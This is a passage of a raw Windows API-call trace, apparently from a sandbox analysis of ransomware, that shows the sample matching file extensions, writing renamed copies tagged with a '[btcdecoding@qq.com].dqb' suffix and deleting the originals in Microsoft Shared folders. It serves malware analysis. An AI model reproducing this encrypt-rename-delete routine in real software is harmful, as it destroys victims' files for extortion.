[0051.496] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0051.496] lstrlenW (lpString=".pdf") returned 4 [0051.496] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0051.496] lstrlenW (lpString=".xls") returned 4 [0051.496] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0051.496] lstrlenW (lpString=".xlsx") returned 5 [0051.496] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0051.496] lstrlenW (lpString=".ppt") returned 4 [0051.496] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0051.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.496] lstrlenW (lpString=".zip") returned 4 [0051.496] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0051.496] lstrlenW (lpString=".rar") returned 4 [0051.496] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0051.497] lstrlenW (lpString=".bz2") returned 4 [0051.497] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0051.497] lstrlenW (lpString=".7z") returned 3 [0051.497] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0051.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.497] lstrlenW (lpString=".dbf") returned 4 [0051.497] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0051.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.497] lstrlenW (lpString=".1cd") returned 4 [0051.497] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0051.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.497] lstrlenW (lpString=".jpg") returned 4 [0051.497] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0051.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.497] lstrlenW (lpString=".doc") returned 4 [0051.497] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0051.497] lstrlenW (lpString=".docx") returned 5 [0051.497] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0051.497] lstrlenW (lpString=".pdf") returned 4 [0051.497] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0051.497] lstrlenW (lpString=".xls") returned 4 [0051.497] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0051.497] lstrlenW (lpString=".xlsx") returned 5 [0051.497] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0051.497] lstrlenW (lpString=".ppt") returned 4 [0051.497] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0051.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.497] lstrlenW (lpString=".zip") returned 4 [0051.497] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0051.497] lstrlenW (lpString=".rar") returned 4 [0051.497] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0051.497] lstrlenW (lpString=".bz2") returned 4 [0051.498] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0051.498] lstrlenW (lpString=".7z") returned 3 [0051.498] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0051.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.498] lstrlenW (lpString=".dbf") returned 4 [0051.498] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0051.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.498] lstrlenW (lpString=".1cd") returned 4 [0051.498] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0051.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.498] lstrlenW (lpString=".jpg") returned 4 [0051.498] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0051.498] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0051.498] lstrlenW (lpString="msgfilt.dll") returned 11 [0051.498] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0052.441] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=38768) returned 1 [0052.441] CloseHandle (hObject=0x184) returned 1 [0052.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 0x20 [0052.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0052.441] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0052.441] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.441] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.441] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0052.708] GetLastError () returned 0x0 [0052.708] ReadFile (in: hFile=0x184, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x9770, lpOverlapped=0x0) returned 1 [0052.711] WriteFile (in: hFile=0x234, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x9780, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x9780, lpOverlapped=0x0) returned 1 [0052.712] ReadFile (in: hFile=0x184, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.712] WriteFile (in: hFile=0x234, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0052.712] SetEndOfFile (hFile=0x234) returned 1 [0052.713] CloseHandle (hObject=0x234) returned 1 [0052.713] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.713] SetEndOfFile (hFile=0x184) returned 1 [0052.714] CloseHandle (hObject=0x184) returned 1 [0052.714] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0052.714] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 1 [0052.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.714] lstrlenW (lpString=".doc") returned 4 [0052.714] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.714] lstrlenW (lpString=".docx") returned 5 [0052.714] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0052.714] lstrlenW (lpString=".pdf") returned 4 [0052.714] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.714] lstrlenW (lpString=".xls") returned 4 [0052.714] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.714] lstrlenW (lpString=".xlsx") returned 5 [0052.715] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0052.715] lstrlenW (lpString=".ppt") returned 4 [0052.715] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.715] lstrlenW (lpString=".zip") returned 4 [0052.715] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.715] lstrlenW (lpString=".rar") returned 4 [0052.715] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.715] lstrlenW (lpString=".bz2") returned 4 [0052.715] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.715] lstrlenW (lpString=".7z") returned 3 [0052.715] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.715] lstrlenW (lpString=".dbf") returned 4 [0052.715] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.715] lstrlenW (lpString=".1cd") returned 4 [0052.715] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.715] lstrlenW (lpString=".jpg") returned 4 [0052.715] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.715] lstrlenW (lpString=".doc") returned 4 [0052.715] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.715] lstrlenW (lpString=".docx") returned 5 [0052.715] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0052.715] lstrlenW (lpString=".pdf") returned 4 [0052.715] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.715] lstrlenW (lpString=".xls") returned 4 [0052.715] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.715] lstrlenW (lpString=".xlsx") returned 5 [0052.715] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0052.715] lstrlenW (lpString=".ppt") returned 4 [0052.715] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.716] lstrlenW (lpString=".zip") returned 4 [0052.716] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.716] lstrlenW (lpString=".rar") returned 4 [0052.716] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.716] lstrlenW (lpString=".bz2") returned 4 [0052.716] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.716] lstrlenW (lpString=".7z") returned 3 [0052.716] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.716] lstrlenW (lpString=".dbf") returned 4 [0052.716] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.716] lstrlenW (lpString=".1cd") returned 4 [0052.716] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0052.716] lstrlenW (lpString=".jpg") returned 4 [0052.716] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.716] lstrcmpiW (lpString1=".FNT", lpString2=".dqb") returned 1 [0052.716] lstrlenW (lpString="CGMIMP32.FNT") returned 12 [0052.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.112] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=606062) returned 1 [0053.112] CloseHandle (hObject=0x218) returned 1 [0053.112] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 0x20 [0053.112] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.112] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.112] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.112] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0053.113] GetLastError () returned 0x0 [0053.113] ReadFile (in: hFile=0x218, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x93f6e, lpOverlapped=0x0) returned 1 [0053.124] WriteFile (in: hFile=0x22c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x93f70, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x93f70, lpOverlapped=0x0) returned 1 [0053.134] ReadFile (in: hFile=0x218, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.134] WriteFile (in: hFile=0x22c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.135] SetEndOfFile (hFile=0x22c) returned 1 [0053.135] CloseHandle (hObject=0x22c) returned 1 [0053.135] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.135] SetEndOfFile (hFile=0x218) returned 1 [0053.140] CloseHandle (hObject=0x218) returned 1 [0053.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.140] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 1 [0053.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.140] lstrlenW (lpString=".doc") returned 4 [0053.141] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0053.141] lstrlenW (lpString=".docx") returned 5 [0053.141] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0053.141] lstrlenW (lpString=".pdf") returned 4 [0053.141] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0053.141] lstrlenW (lpString=".xls") returned 4 [0053.141] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0053.141] lstrlenW (lpString=".xlsx") returned 5 [0053.141] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0053.141] lstrlenW (lpString=".ppt") returned 4 [0053.141] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0053.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.141] lstrlenW (lpString=".zip") returned 4 [0053.141] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0053.141] lstrlenW (lpString=".rar") returned 4 [0053.141] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0053.141] lstrlenW (lpString=".bz2") returned 4 [0053.141] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0053.141] lstrlenW (lpString=".7z") returned 3 [0053.141] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0053.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.141] lstrlenW (lpString=".dbf") returned 4 [0053.141] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0053.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.141] lstrlenW (lpString=".1cd") returned 4 [0053.141] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1 [0053.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.141] lstrlenW (lpString=".jpg") returned 4 [0053.141] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0053.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.141] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.141] lstrlenW (lpString=".doc") returned 4 [0053.142] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0053.142] lstrlenW (lpString=".docx") returned 5 [0053.142] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0053.142] lstrlenW (lpString=".pdf") returned 4 [0053.142] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0053.142] lstrlenW (lpString=".xls") returned 4 [0053.142] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0053.142] lstrlenW (lpString=".xlsx") returned 5 [0053.142] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0053.142] lstrlenW (lpString=".ppt") returned 4 [0053.142] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0053.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.142] lstrlenW (lpString=".zip") returned 4 [0053.142] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0053.142] lstrlenW (lpString=".rar") returned 4 [0053.142] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0053.142] lstrlenW (lpString=".bz2") returned 4 [0053.142] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0053.142] lstrlenW (lpString=".7z") returned 3 [0053.142] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0053.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.142] lstrlenW (lpString=".dbf") returned 4 [0053.142] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0053.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.142] lstrlenW (lpString=".1cd") returned 4 [0053.142] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1 [0053.142] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0053.142] lstrlenW (lpString=".jpg") returned 4 [0053.142] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0053.142] lstrcmpiW (lpString1=".CGM", lpString2=".dqb") returned -1 [0053.142] lstrlenW (lpString="MS.CGM") returned 6 [0053.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.143] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1908) returned 1 [0053.143] CloseHandle (hObject=0x218) returned 1 [0053.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 0x20 [0053.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.143] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.143] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0053.144] GetLastError () returned 0x0 [0053.144] ReadFile (in: hFile=0x218, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x774, lpOverlapped=0x0) returned 1 [0053.306] WriteFile (in: hFile=0x22c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x780, lpOverlapped=0x0) returned 1 [0053.317] ReadFile (in: hFile=0x218, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.317] WriteFile (in: hFile=0x22c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe0, lpOverlapped=0x0) returned 1 [0053.317] SetEndOfFile (hFile=0x22c) returned 1 [0053.317] CloseHandle (hObject=0x22c) returned 1 [0053.317] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.317] SetEndOfFile (hFile=0x218) returned 1 [0053.318] CloseHandle (hObject=0x218) returned 1 [0053.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.318] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 1 [0053.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.318] lstrlenW (lpString=".doc") returned 4 [0053.318] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0053.318] lstrlenW (lpString=".docx") returned 5 [0053.318] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0053.318] lstrlenW (lpString=".pdf") returned 4 [0053.318] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0053.318] lstrlenW (lpString=".xls") returned 4 [0053.318] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0053.319] lstrlenW (lpString=".xlsx") returned 5 [0053.319] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0053.319] lstrlenW (lpString=".ppt") returned 4 [0053.319] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0053.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.319] lstrlenW (lpString=".zip") returned 4 [0053.319] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0053.319] lstrlenW (lpString=".rar") returned 4 [0053.319] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0053.319] lstrlenW (lpString=".bz2") returned 4 [0053.319] lstrcmpiW 